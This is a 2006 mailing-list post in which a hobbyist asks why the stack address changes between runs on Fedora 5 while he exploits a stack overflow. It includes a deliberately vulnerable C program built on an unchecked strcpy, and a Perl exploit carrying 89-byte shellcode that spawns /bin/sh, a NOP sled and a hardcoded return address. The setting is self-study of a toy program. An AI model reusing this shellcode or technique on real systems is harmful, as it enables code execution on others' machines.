Vulnerability Development mailing list archives
"Moving" Stack: my poor return address!
From: Jack C <list-recv () crepinc com>
Date: Mon, 31 Jul 2006 22:03:33 -0400
Hello,To see if I still knew how to code simple buffer overflows after a long absence from it, I threw together a quick vulnerable C program today and wrote and exploit for it. The whole process went great, until I went to find the return address I wanted in the stack. I have a 4096 byte buffer, and since I had the room I put in 2048 NOPs at the beggining of the buffer. However, when I run the exploit then open the core in gdb, the stack is always in a different place. And we're not talking about different place by a few thousand bytes, either. One time I'll run it and the NOPs will be at 0xbfe4dab0, the next time they will.be at 0xbf9af420. That's a HUGE distance away!
I'm running on Fedora 5. Is this a security thing that's new in the past 2 years or so since I've coded one of these? Is there any way I can either (1) make the stack sit still so I can point into it or (2) find out where it is during execution?
------- lame.c ------
#include <stdio.h>
#include <stdlib.h>
int main( int argc, char *argv[]) {
char buffer[4096]; //we're gonna overflow this jawn
if (argc!=2) {
printf("Usage: %s <string to copy>\n",argv[0]);
return 1;
}
strcpy(buffer,argv[1]); //tisk tisk tisk
printf("Buffer now holds: %s\n",buffer);
return 0;
}
-----end lame.c -----
------exp.pl -----
#!/usr/bin/perl
my $prog="/home/jack/break/lame";
my $buffer;
# shellcode - /bin/sh; uname -a; id | 89 bytes */
my $c0de="\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07".
"\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b".
"\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff".
"\xff\xff\x03\x65\x63\x68\x6f\x20\x5b\x45\x6c\x65".
"\x63\x74\x72\x6f\x6e\x69\x63\x53\x6f\x75\x6c\x73".
"\x5d\x3b\x20\x75\x6e\x61\x6d\x65\x20\x2d\x61\x3b".
"\x20\x69\x64\x3b\x20\x03\x2d\x63\x02\x2f\x62\x69".
"\x6e\x2f\x73\x68\x01";
$buffer="\x90"x(2048+(1024-length($c0de))); #NOPs
$buffer.=$c0de; #shellcode
$buffer.="\xc0\x15\x9d\xbf"x(1024/4); #retr addr: 0xbf9d15c0 WAS
in the middle...
# other addresses the NOPS were... look how far apart these are!
#0xbfe4dab0-0xbfe4e640
#0xbf9af420-0xbf9affa0
exec $prog, $buffer;
-----end exp.pl------
Thanks for looking, hope someone can lend a hand...
-Jack Carrozzo
jack _{@}_ crepinc.com
Current thread:
- "Moving" Stack: my poor return address! Jack C (Aug 01)
- Re: "Moving" Stack: my poor return address! Andrea Purificato - bunker (Aug 02)
- Re: "Moving" Stack: my poor return address! Alexander Klimov (Aug 02)
- Re: "Moving" Stack: my poor return address! Steve Bonds (Aug 02)
- Re: "Moving" Stack: my poor return address! Jon Erickson (Aug 02)
- <Possible follow-ups>
- Re: "Moving" Stack: my poor return address! list-recv (Aug 02)
- RE: "Moving" Stack: my poor return address! salexander (Aug 02)
- Re: "Moving" Stack: my poor return address! Javor Ninov (Aug 29)